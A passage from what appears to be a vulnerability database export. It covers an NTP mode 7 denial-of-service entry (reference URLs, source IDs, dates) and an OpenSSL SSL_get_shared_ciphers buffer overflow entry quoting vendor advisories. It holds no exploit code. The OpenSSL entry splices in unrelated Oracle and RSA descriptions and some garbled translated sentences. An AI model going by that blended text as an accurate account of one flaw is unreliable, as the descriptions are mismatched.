            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3720"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4552"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1377"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3560"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2904"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2849"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2905"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3916"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1189"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4552"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1386"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4022"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0590"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1387"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2849"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4316"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
          },
          {
            "trust": 0.1,
            "url": "http://tinyurl.com/yfekgrx"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0115"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1379"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4316"
          },
          {
            "trust": 0.1,
            "url": "https://hostupdate.vmware.com/software/vum/offline/release-192-20100228-732"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2905"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2904"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1378"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1018403"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch4_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_alpha.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_armel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.1,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.4p4+dfsg-8lenny3_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://www13.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001786-v51bb28-es-20100816"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?patchid=t64kit1001787-v51bb27-es-20100817"
          },
          {
            "trust": 0.1,
            "url": "https://h20566.www2.hp.com/portal/site/hpsc/"
          },
          {
            "trust": 0.1,
            "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1252"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0158"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3286"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3080"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4567"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0001"
          },
          {
            "trust": 0.1,
            "url": "http://bit.ly/aqtcqn"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4567"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1013127"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4536"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4021"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0427"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0426"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3621"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6304"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3939"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4020"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3736"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3556"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0097"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4537"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0290"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3612"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4138"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4272"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0382"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4355"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4141"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3613"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4538"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3620"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6304"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2910"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3556"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3889"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2910"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3228"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-10:02/ntpd.patch"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-10:02/ntpd.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-10:02.ntpd.asc"
          },
          {
            "trust": 0.1,
            "url": "https://h20392.www2.hp.com/portal/swdepot/displayp"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
          },
          {
            "trust": 0.1,
            "url": "http://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
          },
          {
            "trust": 0.1,
            "url": "http://itrc.hp.com"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#568372"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3563"
          },
          {
            "db": "BID",
            "id": "37255"
          },
          {
            "db": "PACKETSTORM",
            "id": "83621"
          },
          {
            "db": "PACKETSTORM",
            "id": "86900"
          },
          {
            "db": "PACKETSTORM",
            "id": "83586"
          },
          {
            "db": "PACKETSTORM",
            "id": "94512"
          },
          {
            "db": "PACKETSTORM",
            "id": "105299"
          },
          {
            "db": "PACKETSTORM",
            "id": "121022"
          },
          {
            "db": "PACKETSTORM",
            "id": "90046"
          },
          {
            "db": "PACKETSTORM",
            "id": "84917"
          },
          {
            "db": "PACKETSTORM",
            "id": "121645"
          },
          {
            "db": "PACKETSTORM",
            "id": "99964"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#568372",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#417980",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3563",
            "ident": null
          },
          {
            "db": "BID",
            "id": "37255",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "83621",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "86900",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "83586",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "94512",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "105299",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "121022",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "90046",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "84917",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "121645",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "99964",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002446",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3563",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2009-12-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#568372",
            "ident": null
          },
          {
            "date": "2024-03-19T00:00:00",
            "db": "CERT/CC",
            "id": "VU#417980",
            "ident": null
          },
          {
            "date": "2009-12-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2009-3563",
            "ident": null
          },
          {
            "date": "2009-12-08T00:00:00",
            "db": "BID",
            "id": "37255",
            "ident": null
          },
          {
            "date": "2009-12-10T15:41:54",
            "db": "PACKETSTORM",
            "id": "83621",
            "ident": null
          },
          {
            "date": "2010-03-05T03:32:24",
            "db": "PACKETSTORM",
            "id": "86900",
            "ident": null
          },
          {
            "date": "2009-12-09T00:03:34",
            "db": "PACKETSTORM",
            "id": "83586",
            "ident": null
          },
          {
            "date": "2010-10-05T21:10:50",
            "db": "PACKETSTORM",
            "id": "94512",
            "ident": null
          },
          {
            "date": "2011-09-23T12:12:00",
            "db": "PACKETSTORM",
            "id": "105299",
            "ident": null
          },
          {
            "date": "2013-03-30T12:12:00",
            "db": "PACKETSTORM",
            "id": "121022",
            "ident": null
          },
          {
            "date": "2010-05-28T20:14:56",
            "db": "PACKETSTORM",
            "id": "90046",
            "ident": null
          },
          {
            "date": "2010-01-07T19:01:14",
            "db": "PACKETSTORM",
            "id": "84917",
            "ident": null
          },
          {
            "date": "2013-05-15T16:22:00",
            "db": "PACKETSTORM",
            "id": "121645",
            "ident": null
          },
          {
            "date": "2011-04-01T21:06:48",
            "db": "PACKETSTORM",
            "id": "99964",
            "ident": null
          },
          {
            "date": "2009-12-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200912-113",
            "ident": null
          },
          {
            "date": "2010-01-25T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2009-002446",
            "ident": null
          },
          {
            "date": "2009-12-09T18:30:00.390000",
            "db": "NVD",
            "id": "CVE-2009-3563",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#568372",
            "ident": null
          },
          {
            "date": "2024-03-20T00:00:00",
            "db": "CERT/CC",
            "id": "VU#417980",
            "ident": null
          },
          {
            "date": "2017-09-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2009-3563",
            "ident": null
          },
          {
            "date": "2015-05-12T19:46:00",
            "db": "BID",
            "id": "37255",
            "ident": null
          },
          {
            "date": "2009-12-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200912-113",
            "ident": null
          },
          {
            "date": "2024-03-22T04:19:00",
            "db": "JVNDB",
            "id": "JVNDB-2009-002446",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2009-3563",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "83621"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "NTP mode 7 denial-of-service vulnerability",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#568372"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "design error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200912-113"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200609-0823

    Vulnerability from variot - Updated: 2026-03-05 22:12

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. The Oracle SYS.DBMS_AQ package is vulnerable to PL/SQL injection. This vulnerability may allow a remote, authenticated attacker to execute arbitrary PL/SQL commands on a vulnerable Oracle installation. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. OpenSSL Security Advisory [28th September 2006]

    New OpenSSL releases are now available to correct four security issues.

    ASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)

    Vulnerability

    Dr. Henson recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory (CVE-2006-2937). (This issue did not affect OpenSSL versions prior to 0.9.7)

    1. Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack (CVE-2006-2940).

    Any code which uses OpenSSL to parse ASN.1 data from untrusted sources is affected. This includes SSL servers which enable client authentication and S/MIME applications.

    Acknowledgements

    The OpenSSL team thank Dr S. Henson of Open Network Security and NISCC for funding the ASN.1 test suite project.

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    SSLv2 Client Crash (CVE-2006-4343)

    Vulnerability

    A flaw in the SSLv2 client code was discovered.

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    Recommendations

    These vulnerabilities are resolved in the following versions of OpenSSL:

    • in the 0.9.7 branch, version 0.9.7l (or later);
    • in the 0.9.8 branch, version 0.9.8d (or later).

    OpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via HTTP and FTP from the following master locations (you can find the various FTP mirrors under https://www.openssl.org/source/mirror.html):

    o https://www.openssl.org/source/
    o ftp://ftp.openssl.org/source/
    

    The distribution file names are:

    o openssl-0.9.8d.tar.gz
      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa
      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2
    
    o openssl-0.9.7l.tar.gz
      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e
      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d
    

    The checksums were calculated using the following commands:

    openssl md5 openssl-0.9*.tar.gz
    openssl sha1 openssl-0.9*.tar.gz
    

    After upgrading make sure to recompile any applications statically linked to OpenSSL libraries and restart all applications that use OpenSSL. rPath Security Advisory: 2006-0175-2 Published: 2006-09-28 Updated: 2006-09-29 Resolved issue in patch for CVE-2006-2940 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.

    29 September 2006 Update: The initial fix for this vulnerability was
    incomplete, and the fault in the fix could enable a Denial of Service
    attack in some cases of the attack described in CVE-2006-2940.
    

    Full-Disclosure - We believe in it.

    Update:

    There was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    Updated Packages:

    Mandriva Linux 2006.0: 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm 526fcd69e1a1768c82afd573dc16982f 2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

